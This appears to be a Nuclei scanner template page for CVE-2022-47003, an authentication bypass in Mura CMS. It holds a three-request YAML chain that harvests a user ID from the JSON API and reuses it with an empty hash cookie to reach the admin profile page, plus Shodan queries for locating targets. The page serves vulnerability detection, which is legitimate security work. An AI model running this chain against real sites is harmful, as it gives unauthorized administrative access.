Skip to content
Nuclei Templates

Mura CMS <10.0.580 - Authentication Bypass

ID: CVE-2022-47003

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2022,auth-bypass,cms,mura,murasoftware

Description

Section titled “Description”

Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2022-47003


info:
  name: Mura CMS <10.0.580 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mura CMS before 10.0.580 is susceptible to authentication bypass in the Remember Me function. An attacker can bypass authentication via a crafted web request and thereby obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Mura CMS application.
  remediation: |
    Upgrade Mura CMS to version 10.0.580 or later to mitigate this vulnerability.
  reference:
    - https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html
    - http://mura.com
    - https://www.murasoftware.com/mura-cms/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-47003
    - https://hoyahaxa.blogspot.com/2023/01/preliminary-security-advisory.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-47003
    cwe-id: CWE-863
    epss-score: 0.02341
    epss-percentile: 0.88676
    cpe: cpe:2.3:a:murasoftware:mura_cms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: murasoftware
    product: mura_cms
    shodan-query:
      - 'Generator: Mura CMS'
      - "generator: mura cms"
  tags: cve,cve2022,auth-bypass,cms,mura,murasoftware


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
        Host: {{Hostname}}
        Cookie: userid={{uuid}}; userhash=


    redirects: true
    max-redirects: 2


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3,"\"userid\"")'
        condition: and


      - type: word
        part: body_3
        words:
          - "Edit Profile"


    extractors:
      - type: regex
        name: siteid
        group: 1
        regex:
          - 'siteid:"(.*?)"'
        internal: true
        part: body


      - type: regex
        name: uuid
        group: 1
        regex:
          - '"lastupdatebyid":"([A-F0-9-]+)"'
        internal: true
        part: body
# digest: 4a0a0047304502205ab79c4e674636b36cac2aaff1040cad3e04dc6cf6d39b9a2b462039d87653af022100b170edcadc5c46218c2222b21419b071f4cdcc33a510452543aa3479125c5c89:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-47003.yaml"

View on Github